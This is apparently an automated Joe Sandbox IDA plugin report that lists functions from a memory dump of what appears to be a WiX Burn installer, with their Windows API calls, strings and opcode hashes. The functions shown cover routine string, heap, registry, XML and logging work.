Opcode ID: 5a4441cf03c42b1070f61c9d221a58c8f969ceea3dbfd6451890caedcf5d42fe
Instruction ID: eba8f11dfd044c7e9ae82e1bc95734f7cd8587ab0da3f37f5855bb0981aebcad
Opcode Fuzzy Hash: 5a4441cf03c42b1070f61c9d221a58c8f969ceea3dbfd6451890caedcf5d42fe
Instruction Fuzzy Hash: 11412D72A04719ABDB10DBA9C841AEEB7F8AB08710F05416AF905F7391D775EE40CBA4

Function 000C21AC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C21F2
GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C21FE

Part of subcall function 000C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,000C21CC,000001C7,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3BDB
Part of subcall function 000C3BD3: HeapSize.KERNEL32(00000000,?,000C21CC,000001C7,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3BE2

Strings

strutil.cpp, xrefs: 000C2222

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: c0c62349c2a8b47fa65be74d62efdb99024b54924ed60bc3c39e6e248027d1d3
Instruction ID: e16e2267e3dc3e33e57b7ff2a427c8a182237b67b5098b553172e94fba532c26
Opcode Fuzzy Hash: c0c62349c2a8b47fa65be74d62efdb99024b54924ed60bc3c39e6e248027d1d3
Instruction Fuzzy Hash: CA31F632615226BBD7208FA5CC44F6F3B99AF55774B21422CFD55ABA90EB71CC4087D0

Function 001094FD Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00100F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0012AAA0,00000000,?,001057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00100F80

RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 001095D5
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 00109610
RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 0010962C
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 00109639
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 00109646

Part of subcall function 00100FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,001095C2,00000001), ref: 00100FED

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Close$InfoOpenQuery
String ID:
API String ID: 796878624-0
Opcode ID: 7eaa220f659eb6fa0c0ac5335eb53351cd841c5cd8b6eea492052951373f481d
Instruction ID: d4578fed655dc097b2113de6d77e4bca74d7692c3333429d90a6f561345c9557
Opcode Fuzzy Hash: 7eaa220f659eb6fa0c0ac5335eb53351cd841c5cd8b6eea492052951373f481d
Instruction Fuzzy Hash: 23416E72C0162DFFCF22AF94CD819ADFBB9EF18750F1141AAE95076162C7B24E509A90

Function 000C8A07 Relevance: 7.6, APIs: 5, Instructions: 118stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,000C8BC8,000C972D,?,000C972D,?,?,000C972D,?,?), ref: 000C8A27
lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,000C8BC8,000C972D,?,000C972D,?,?,000C972D,?,?), ref: 000C8A2F
CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,000C8BC8,000C972D,?,000C972D,?), ref: 000C8A7E
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,000C8BC8,000C972D,?,000C972D,?), ref: 000C8AE0
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,000C8BC8,000C972D,?,000C972D,?), ref: 000C8B0D

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString$lstrlen
String ID:
API String ID: 1657112622-0
Opcode ID: 87fdb8dd22bdc827a8d77a3d582f46106203f87630e68a1c6759c991a2fb8485
Instruction ID: 46395e86eaa6f132948cafc6ae78f3c7fbe75a1bbb562b2910ded3f5fdcd83d6
Opcode Fuzzy Hash: 87fdb8dd22bdc827a8d77a3d582f46106203f87630e68a1c6759c991a2fb8485
Instruction Fuzzy Hash: B3314072A05108BFDB258F58DC85FAE3FAAEB48390F15C41AF90987211CB719D90DBA5

Function 000C74B7 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000C53BD,WixBundleOriginalSource,?,?,000DA623,840F01E8,WixBundleOriginalSource,?,0012AA90,?,00000000,000C5445,00000001,?,?,000C5445), ref: 000C74C3
LeaveCriticalSection.KERNEL32(000C53BD,000C53BD,00000000,00000000,?,?,000DA623,840F01E8,WixBundleOriginalSource,?,0012AA90,?,00000000,000C5445,00000001,?), ref: 000C752A

Strings

Failed to get value as string for variable: %ls, xrefs: 000C7519
Failed to get value of variable: %ls, xrefs: 000C74FD
WixBundleOriginalSource, xrefs: 000C74BF

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
API String ID: 3168844106-30613933
Opcode ID: 1205df35d3e30ddea52abb0a2742041b08df408bce5d8946a76619e73677541b
Instruction ID: 222b5268a38871d4bd518b3a4fae306e35a4c0370ef905dbec267bfa1de52af2
Opcode Fuzzy Hash: 1205df35d3e30ddea52abb0a2742041b08df408bce5d8946a76619e73677541b
Instruction Fuzzy Hash: D6017172944529FBCF225F54CC05F9E7F68EF14361F104169FD08A6261C3B69E519BD0

Function 000ED152 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,?,00000000,?,000ED148,00000000), ref: 000ED16D
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,000ED148,00000000), ref: 000ED179
CloseHandle.KERNEL32(0010B518,00000000,?,00000000,?,000ED148,00000000), ref: 000ED186
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,000ED148,00000000), ref: 000ED193
UnmapViewOfFile.KERNEL32(0010B4E8,00000000,?,000ED148,00000000), ref: 000ED1A2

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 58a5f9e088bce2aa0110bbb95ec6c0b22da5628a9af73457585811b9b5b33573
Instruction ID: 1ee77aa08ca51877d0d133275da81345036258185ad3f5752b9c66a92b95490b
Opcode Fuzzy Hash: 58a5f9e088bce2aa0110bbb95ec6c0b22da5628a9af73457585811b9b5b33573
Instruction Fuzzy Hash: 3201E476405B55EFCB31AF66D89081AF7E9EF50711315893FE1A662930C371A890DF40

Function 00107B16 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

SysFreeString.OLEAUT32(00000000), ref: 00107C74
SysFreeString.OLEAUT32(00000000), ref: 00107C7F
SysFreeString.OLEAUT32(00000000), ref: 00107C8A

Strings

atomutil.cpp, xrefs: 00107B49

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: atomutil.cpp
API String ID: 2724874077-4059165915
Opcode ID: d4dd951961f4a1fc8164d2bb36061567eebf1a00825e38a6282a8e792788c114
Instruction ID: 55a0204941cf1f1ebe4b7069ce61d47e704ec80ec386a36763da438a5fca868f
Opcode Fuzzy Hash: d4dd951961f4a1fc8164d2bb36061567eebf1a00825e38a6282a8e792788c114
Instruction Fuzzy Hash: 7C515271D0522AAFDB21DB64C944FAEB7B8AF04710F154198E945AF2D1DBB1EE40CBA0

Function 00108713 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00108820
GetLastError.KERNEL32 ref: 0010882A

Strings

clbcatq.dll, xrefs: 00108731, 0010873C
timeutil.cpp, xrefs: 0010884E

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Time$ErrorFileLastSystem
String ID: clbcatq.dll$timeutil.cpp
API String ID: 2781989572-961924111
Opcode ID: 51a9a5b7da2235e3a567b0469976b6cc893a56f847ab81c21133c20fe2467ffb
Instruction ID: 6922664a10b87ac93b9a901de3f669c2581d9d3883a1ce1746cb88ad58df20a7
Opcode Fuzzy Hash: 51a9a5b7da2235e3a567b0469976b6cc893a56f847ab81c21133c20fe2467ffb
Instruction Fuzzy Hash: E8411736E0421AA6D7249BB88C41BBF7765AF50700F55852AF6C1B71C5EFB1CE0187A1

Function 001036CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(000002C0), ref: 001036E6
SysAllocString.OLEAUT32(?), ref: 001036F6
VariantClear.OLEAUT32(?), ref: 001037D5

Strings

xmlutil.cpp, xrefs: 0010370E

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Variant$AllocClearInitString
String ID: xmlutil.cpp
API String ID: 2213243845-1270936966
Opcode ID: 4d7934ce336474ab2f94ce081eea7e9c1da346a338cb29716025d438bb7ee95f
Instruction ID: 6fc71606b562dd8a6f140c9471145d947c5504554cc62de263273bd8e4214a86
Opcode Fuzzy Hash: 4d7934ce336474ab2f94ce081eea7e9c1da346a338cb29716025d438bb7ee95f
Instruction Fuzzy Hash: 544176F6A01229ABCB11DFA5C888EAFBBBCAF05710F1541A4FC51EB241D770DE008B90

Function 00100E4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,000E8E1B), ref: 00100EAA
RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,000E8E1B,00000000), ref: 00100EC8
RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,000E8E1B,00000000,00000000,00000000), ref: 00100F1E

Strings

regutil.cpp, xrefs: 00100EEE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Enum$InfoQuery
String ID: regutil.cpp
API String ID: 73471667-955085611
Opcode ID: 71e11d837ba75988b8938ed9ca504851d1342483a11cd00e6d530beb10d3d430
Instruction ID: 1ed52fcfcc9b54602e2f934aae22f931cc81087f2e73ff5de0a5aea81f58838f
Opcode Fuzzy Hash: 71e11d837ba75988b8938ed9ca504851d1342483a11cd00e6d530beb10d3d430
Instruction Fuzzy Hash: 0431A17690112ABBEB328B94CD80FAFB76DEF0C750F154065BD44BB290D7B18E10A7A0

Function 00107A10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

SysFreeString.OLEAUT32(00000000), ref: 00107AF4
SysFreeString.OLEAUT32(?), ref: 00107AFF
SysFreeString.OLEAUT32(00000000), ref: 00107B0A

Strings

atomutil.cpp, xrefs: 00107A3D

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: atomutil.cpp
API String ID: 2724874077-4059165915
Opcode ID: 7d33de4828da854750bed3149a2310ec3d4ff3c23203737969b878ee0e1bcb33
Instruction ID: a54d28926002dd3d104f2b92b408642cb6f805882c65ec9f24be95aacab7d799
Opcode Fuzzy Hash: 7d33de4828da854750bed3149a2310ec3d4ff3c23203737969b878ee0e1bcb33
Instruction Fuzzy Hash: 16318432E05129FBCB12AB94CC45F9EBBA8EF00750F154165F941AB1D1DBB0AE009BD0

Function 000E8B17 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00100F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0012AAA0,00000000,?,001057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00100F80

RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,000E8E57,00000000,00000000), ref: 000E8BD4

Strings

Failed to open uninstall key for potential related bundle: %ls, xrefs: 000E8B43
Failed to ensure there is space for related bundles., xrefs: 000E8B87
Failed to initialize package from related bundle id: %ls, xrefs: 000E8BBA

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
API String ID: 47109696-1717420724
Opcode ID: ea1404ac101400424f8d1a723c66d6e8ce995f6866eef487acbed5d02e093b80
Instruction ID: 7654f5e9cc237ce4984813746a6fe19a48f2a7d7b3363bfb4055352b71cbb002
Opcode Fuzzy Hash: ea1404ac101400424f8d1a723c66d6e8ce995f6866eef487acbed5d02e093b80
Instruction Fuzzy Hash: 9A218EB2940659FFDF229E81CD46FEEBBB8EF04711F108155F904B6190DB719A60EB90

Function 000C3B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,000C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,000C13B8), ref: 000C3B33
HeapReAlloc.KERNEL32(00000000,?,000C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,000C13B8,000001C7,00000100,?,80004005,00000000), ref: 000C3B3A

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

Part of subcall function 000C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,000C21CC,000001C7,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3BDB
Part of subcall function 000C3BD3: HeapSize.KERNEL32(00000000,?,000C21CC,000001C7,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3BE2

_memcpy_s.LIBCMT ref: 000C3B86

Strings

memutil.cpp, xrefs: 000C3BC7

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$Process$AllocAllocateSize_memcpy_s
String ID: memutil.cpp
API String ID: 3406509257-2429405624
Opcode ID: 64ac1a4f7fe3c8f3191c30bbaf49af6c725ccb2919d1393d3c14a4bff566c94d
Instruction ID: 44e9bc329a212ef1ea227b09cc71c2cd92248c1a8173bbc8cdc651bb78659e53
Opcode Fuzzy Hash: 64ac1a4f7fe3c8f3191c30bbaf49af6c725ccb2919d1393d3c14a4bff566c94d
Instruction Fuzzy Hash: 6411E431524219ABCB226F68DC49FAE3A99DF40720B05C21CFE149B262D771CF6092D0

Function 0010894D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00108991
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001089B9
GetLastError.KERNEL32 ref: 001089C3

Strings

inetutil.cpp, xrefs: 001089E4

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastTime$FileSystem
String ID: inetutil.cpp
API String ID: 1528435940-2900720265
Opcode ID: 2859a3cc6cbd655c2b25408453d40b1648153b0c9c7f626b6f2b5219127fceba
Instruction ID: c4a4c3749dab0d7cbaaefacce50322f0f14a981ca1f7a15915128741db03c4cf
Opcode Fuzzy Hash: 2859a3cc6cbd655c2b25408453d40b1648153b0c9c7f626b6f2b5219127fceba
Instruction Fuzzy Hash: 27119A7390513AA7D720ABA5CD45BBFBBA89F44754F010115BEC5F7280DB609D0486E2

Function 000D3AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00100F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0012AAA0,00000000,?,001057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00100F80

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,000D3FB5,feclient.dll,?,00000000,?,?,?,000C4B12), ref: 000D3B42

Part of subcall function 001010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0010112B
Part of subcall function 001010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00101163

Strings

feclient.dll, xrefs: 000D3AAB
Logging, xrefs: 000D3AD4
SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 000D3AB7

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: 26df1aea98e2672ae5876fb397b887819c9c5b574929804d6d01a354718a8547
Instruction ID: c38db81d8a430c9507ab452bb3e945289b685f80b0dd76032e80252bd8f1914c
Opcode Fuzzy Hash: 26df1aea98e2672ae5876fb397b887819c9c5b574929804d6d01a354718a8547
Instruction Fuzzy Hash: 95118436640308BBDB21DA55DC82EABBBB8EB14720F400067E64057291D7B15F81D621

Function 00100764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(000E12CF,00000000,00000000,?,?,?,00100013,000E12CF,000E12CF,?,00000000,0000FDE9,?,000E12CF,8007139F,Invalid operation for this state.), ref: 00100776
WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,00100013,000E12CF,000E12CF,?,00000000,0000FDE9,?,000E12CF,8007139F), ref: 001007B2
GetLastError.KERNEL32(?,?,00100013,000E12CF,000E12CF,?,00000000,0000FDE9,?,000E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 001007BC

Strings

logutil.cpp, xrefs: 001007ED

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 377740a5032ab02c0dbf1d7682c1142ab1e931110bcb7d2036ee8b521e57ebb4
Instruction ID: 2ff957851f00c2893852dbbed4e2b1ca1f193ec9f32fc37cd2b1864ff0ce8dd1
Opcode Fuzzy Hash: 377740a5032ab02c0dbf1d7682c1142ab1e931110bcb7d2036ee8b521e57ebb4
Instruction Fuzzy Hash: 4D110A72A04124EBC3259B659C84FBFBA6CEB48760F010228FDC0E7680D7B4AD40C9E0

